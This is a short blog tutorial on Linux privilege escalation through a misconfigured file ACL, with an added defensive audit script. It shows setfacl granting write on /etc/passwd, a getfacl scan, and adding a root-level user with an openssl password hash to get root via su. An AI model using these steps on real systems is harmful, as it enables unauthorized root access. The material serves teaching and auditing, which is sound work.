I am writing this blog because I didn't find many resources on ACL privilege escalation.
An ACL is a special permission given to a specific user on an XFS file system.
First I will show how to configure an ACL in a way that makes the system vulnerable, then we will exploit it to get superuser.
Configuration
I am setting this permission on /etc/passwd
syntax
# setfacl -m "u:username:permissions" file.txt
So the permissions I am setting on passwd are:
# setfacl -m "u:tanishq:rwx" /etc/passwd
Now our work is done. If you want to remove the permission, you can use the command below:
# setfacl -b /etc/passwd
LET'S EXPLOIT
For exploiting I am using a normal user with no special sudo powers.
To find files that have ACL permissions, use the command:
$ rm -f /tmp/getfacl.txt; getfacl -R -s -p / 2>/dev/null > /tmp/getfacl.txt; cat /tmp/getfacl.txt | grep -v "getfacl:"
It will list the files that have ACL permissions. Now try to find one that can help us escalate in some way.

Here at the end, see that our current user has permission to write to passwd.
Now we will try to create a new user and give it our custom password.
$ vim /etc/passwd

Here I have created a new user with the name root_me
and for the password I used the openssl command
MAIN HOST# openssl passwd 123
now save the file
and switch the user
$ su - root_me

Here we got root through the ACL misconfiguration.
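To audit a host for this same misconfiguration, the getfacl -R -s -p scan shown earlier can be narrowed down to the entries that matter. The following is an added example, not part of the original post: it reports only named user or group ACL entries that keep effective write access once the mask is applied. The function names and the sample getfacl output are constructed for illustration.

```shell
# audit_acl_writers: read `getfacl -R -s -p <dir>` output on stdin and print
# "path<TAB>entry" for every named user/group entry that keeps effective
# write access (the entry has w AND the mask, if present, has w).
audit_acl_writers() {
    awk '
    function flush(   i) {
        for (i = 1; i <= n; i++)
            if (mask == "" || mask ~ /w/) print file "\t" entry[i]
        n = 0; mask = ""
    }
    /^# file: /  { flush(); file = substr($0, 9); next }
    /^#/ || /^$/ { next }
    {
        sub(/[ \t]*#.*/, "")                # drop "#effective:" annotations
        split($0, f, ":")                   # tag:qualifier:perms
        if (f[1] == "mask") { mask = f[3]; next }
        # named entries have a non-empty qualifier; user:: and group:: do not
        if ((f[1] == "user" || f[1] == "group") && f[2] != "" && f[3] ~ /w/)
            entry[++n] = $0
    }
    END { flush() }'
}

# Constructed sample of getfacl output (not captured from a real host).
sample_getfacl() {
    cat <<'EOF'
# file: /etc/passwd
# owner: root
# group: root
user::rw-
user:tanishq:rwx
group::r--
mask::rwx
other::r--

# file: /srv/reports
# owner: root
# group: root
user::rwx
user:alice:rwx	#effective:r-x
group::r-x
mask::r-x
other::---

EOF
}

sample_getfacl | audit_acl_writers   # reports only the /etc/passwd entry
```

On a real system, pipe the scan into the function (getfacl -R -s -p /etc 2>/dev/null | audit_acl_writers) and clear any unexpected entry with setfacl -b as shown in the Configuration section.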
If you are still confused or have a better way, DM me on Twitter: root_tanishq
Bye :D